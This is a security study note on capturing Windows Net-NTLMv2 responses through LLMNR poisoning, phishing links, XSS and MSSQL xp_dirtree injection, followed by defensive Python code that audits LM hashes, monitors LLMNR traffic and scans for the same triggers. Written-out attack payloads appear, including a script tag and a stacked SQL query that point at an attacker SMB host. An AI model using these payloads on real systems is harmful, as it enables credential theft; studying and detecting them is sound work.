Reference: [0xdf](https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html#database-access)

# NTLM

- `LM Hash`: an obsolete hash kept for compatibility with old Windows versions. It is weak, so it is disabled on most modern systems.
- `NT Hash`: the primary hash actually used for authentication. What is usually called the `NTLM hash` means this one.
- Likewise, a `Pass-the-Hash` attack only needs the `NT` hash.
- What the sections below capture is a Net-NTLMv2 challenge/response, not the NT hash itself: it can be cracked offline, but it cannot be replayed directly for Pass-the-Hash.

```bash
# domain\uid:rid:lmhash:nthash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
```

# LLMNR Poisoning

```bash
# start responder
responder -I tun0

# visit a network path that doesn't exist
\\badservername\share\

# an LLMNR request will go out and you capture a challenge/response.
```

# User Interaction

Another way to obtain a Net-NTLMv2 response is to get the user to visit an SMB share I control. This is commonly seen in phishing campaigns that send `file://` links in email.

XSS version:

```html
<script language='javascript' src="\\10.10.14.15\share"></script>
```

# Database

If I can get the database to request a file from me, I can capture the credentials of the account the database service runs as. Since MSSQL on Windows allows stacked queries (`; [another statement]`), I can inject by appending `EXEC master..xp_dirtree "\\$IP\test"; --`. This makes the database request the file from me, and the SMB connection carries the challenge/response.
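An added example for the NTLM section (my own code, not from the note or from 0xdf's post): a parser for the `domain\uid:rid:lmhash:nthash:::` dump format shown above that reports which accounts still have a real LM hash stored, using the empty-LM-hash value from the Administrator line as the "LM disabled" marker. The `CORP\legacysvc` record and both of its hash values are constructed placeholders.

```python
import re
from dataclasses import dataclass
from typing import Optional

# LM hash of an empty/absent password. When every record carries it, LM hash
# storage is disabled, which is the expected state on modern systems.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

# Record format from the note: [domain\]user:rid:lmhash:nthash:::
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


@dataclass
class HashRecord:
    domain: Optional[str]
    user: str
    rid: int
    lm_hash: str
    nt_hash: str

    @property
    def lm_stored(self) -> bool:
        # Anything other than the empty marker means a crackable LM hash is on disk.
        return self.lm_hash != EMPTY_LM_HASH


def parse_hash_line(line: str) -> HashRecord:
    """Parse one dump record; raise ValueError on anything malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a domain\\user:rid:lm:nt::: record: {line!r}")
    return HashRecord(
        m["domain"], m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()
    )


def audit_dump(lines):
    """Return the usernames whose records still carry a real LM hash."""
    findings = []
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # blank line or comment, as in the note's sample
        rec = parse_hash_line(line)
        if rec.lm_stored:
            findings.append(rec.user)
    return findings


# Constructed sample: the Administrator line from the note (LM disabled) plus a
# made-up legacy account whose LM and NT hash values are placeholders.
SAMPLE_DUMP = """
# domain\\uid:rid:lmhash:nthash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
CORP\\legacysvc:1105:0123456789abcdef0123456789abcdef:0123456789abcdef0123456789abcdef:::
""".splitlines()

if __name__ == "__main__":
    for user in audit_dump(SAMPLE_DUMP):
        print(f"LM hash still stored for {user}")
```

Accounts listed by `audit_dump` are the ones whose passwords were last set while LM storage was enabled; a password change after disabling LM storage clears the LM half.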
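An added example for the LLMNR Poisoning section (my own code, not from the note): a decoder for the DNS-shaped LLMNR query and a small monitor that, given datagrams captured to the LLMNR multicast group 224.0.0.252 on UDP 5355, reports which hosts are still sending LLMNR queries and which queried names had no legitimate owner. Hosts that appear in the report have not received the "Turn off multicast name resolution" policy (`EnableMulticast = 0` under `HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient`), which is the fix for what this section describes. The datagram list and the `build_llmnr_query` helper are constructed for the example.

```python
import struct

LLMNR_MCAST_ADDR = "224.0.0.252"  # IPv4 multicast group LLMNR queries are sent to
LLMNR_PORT = 5355


def _encode_name(name: str) -> bytes:
    # DNS-style labels: length byte followed by the label, terminated by 0x00.
    out = b""
    for label in name.split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_llmnr_query(txid: int, name: str, qtype: int = 1) -> bytes:
    """Constructed helper that fabricates a sample LLMNR query (A record by default)."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)  # flags=0, QDCOUNT=1
    return header + _encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_llmnr(payload: bytes) -> dict:
    """Decode the LLMNR header and its single question."""
    if len(payload) < 12:
        raise ValueError("payload shorter than the LLMNR header")
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", payload[:12])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    labels, off = [], 12
    while True:
        length = payload[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointers are not valid in the question name")
        labels.append(payload[off:off + length].decode("ascii"))
        off += length
    qtype, qclass = struct.unpack("!HH", payload[off:off + 4])
    return {
        "id": txid,
        "is_response": bool(flags & 0x8000),  # QR bit
        "name": ".".join(labels),
        "qtype": qtype,
        "qclass": qclass,
    }


def llmnr_report(datagrams, known_hosts):
    """
    datagrams: iterable of (src_ip, dst_ip, dst_port, payload).
    Returns {src_ip: {"queries": [...], "unresolved": [...]}} for every host that
    still multicasts LLMNR queries. "unresolved" holds the names no known host
    owns: those lookups go unanswered, which is the moment a poisoner answers.
    """
    known = {h.lower() for h in known_hosts}
    report = {}
    for src, dst, port, payload in datagrams:
        if dst != LLMNR_MCAST_ADDR or port != LLMNR_PORT:
            continue  # not LLMNR (e.g. unicast DNS on 53)
        q = parse_llmnr(payload)
        if q["is_response"]:
            continue
        entry = report.setdefault(src, {"queries": [], "unresolved": []})
        entry["queries"].append(q["name"])
        if q["name"].lower() not in known:
            entry["unresolved"].append(q["name"])
    return report


# Constructed capture: one workstation looking up the note's bogus name and a
# real server, plus an unrelated DNS datagram that must be ignored.
SAMPLE_DATAGRAMS = [
    ("10.0.0.21", LLMNR_MCAST_ADDR, LLMNR_PORT, build_llmnr_query(0x1234, "badservername")),
    ("10.0.0.21", LLMNR_MCAST_ADDR, LLMNR_PORT, build_llmnr_query(0x1235, "fileserver01")),
    ("10.0.0.30", "10.0.0.1", 53, b"\x00" * 20),
]

if __name__ == "__main__":
    for src, entry in llmnr_report(SAMPLE_DATAGRAMS, ["fileserver01"]).items():
        print(src, "still uses LLMNR; unanswered lookups:", entry["unresolved"])
```

A recurring source in this report is a machine to fix; a recurring unresolved name (a typo in a logon script, a stale mapped drive) is a lookup that will keep leaking a challenge/response until the policy is applied.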
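An added example for the User Interaction and Database sections (my own code, not from the note): a scanner for the three triggers those sections describe, a UNC path embedded in HTML, a `file://` link in mail text, and a stacked `xp_dirtree` call in a SQL statement, with each referenced host checked against an assumed list of trusted networks and known hostnames. The XSS line and the injection payload are taken from the note; the phishing text, the trusted networks, the known-host list and the `xp_fileexist` entry (another MSSQL procedure that takes a path) are my additions.

```python
import ipaddress
import re

# \\host or \\host\share\... ; the host is captured for triage.
UNC_RE = re.compile(r'\\\\([A-Za-z0-9._-]+)(?:\\[^\s"<>]*)?')
# file://host/... links as used in the phishing campaigns the note mentions.
FILE_URL_RE = re.compile(r"file://+([A-Za-z0-9._-]+)/", re.IGNORECASE)
# MSSQL procedures that make the server open a path; xp_dirtree is the one in the note.
PATH_PROCS = ("xp_dirtree", "xp_fileexist")
PROC_RE = re.compile(
    r"\b(?:master\s*\.\.\s*)?(" + "|".join(PATH_PROCS) + r")\b", re.IGNORECASE
)


def find_outbound_auth_triggers(text: str):
    """Return every construct in text that would make a Windows host or MSSQL
    service authenticate to a remote share."""
    findings = []
    for m in UNC_RE.finditer(text):
        findings.append({"kind": "unc", "host": m.group(1), "match": m.group(0)})
    for m in FILE_URL_RE.finditer(text):
        findings.append({"kind": "file_url", "host": m.group(1), "match": m.group(0)})
    for m in PROC_RE.finditer(text):
        findings.append({"kind": "mssql_proc", "proc": m.group(1).lower(), "match": m.group(0)})
    return findings


def host_is_trusted(host: str, trusted_nets, known_hosts) -> bool:
    """An IP inside a trusted network, or a hostname on the known list, is fine.
    Any other bare name is not: it may end up resolved through LLMNR."""
    if host.lower() in {h.lower() for h in known_hosts}:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(ip in net for net in trusted_nets)


def triage(samples, trusted_nets, known_hosts):
    """Scan each labelled sample and mark every host-bearing finding as trusted or not."""
    result = {}
    for label, text in samples.items():
        findings = find_outbound_auth_triggers(text)
        for f in findings:
            if "host" in f:
                f["trusted"] = host_is_trusted(f["host"], trusted_nets, known_hosts)
        result[label] = findings
    return result


# Assumed environment (constructed): the corporate ranges and the known servers.
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/16"), ipaddress.ip_network("192.168.0.0/16")]
KNOWN_HOSTS = ["fileserver01"]

# Samples: "xss" and "sqli" reuse the note's payloads; the rest are constructed.
SAMPLES = {
    "xss": '<script language=\'javascript\' src="\\\\10.10.14.15\\share"></script>',
    "phish": "Quarterly numbers are at file://10.10.14.15/reports/q3.xlsx",
    "sqli": 'SELECT * FROM items WHERE id = 1; EXEC master..xp_dirtree "\\\\10.10.14.15\\test"; --',
    "internal": "\\\\fileserver01\\public\\policy.docx",
    "benign_sql": "SELECT name FROM sys.tables",
}

if __name__ == "__main__":
    for label, findings in triage(SAMPLES, TRUSTED_NETS, KNOWN_HOSTS).items():
        for f in findings:
            print(f"{label}: {f['kind']} -> {f.get('host', f.get('proc'))} trusted={f.get('trusted')}")
```

A finding with `trusted` false is exactly the case the note describes: the browser, Explorer or the MSSQL service account opens an SMB session to that host and hands over a challenge/response. The `mssql_proc` hits are worth alerting on even without a UNC argument, since `xp_dirtree` has no business appearing in application-issued SQL, and egress filtering of TCP 445 from servers and workstations removes the channel regardless of which trigger was used.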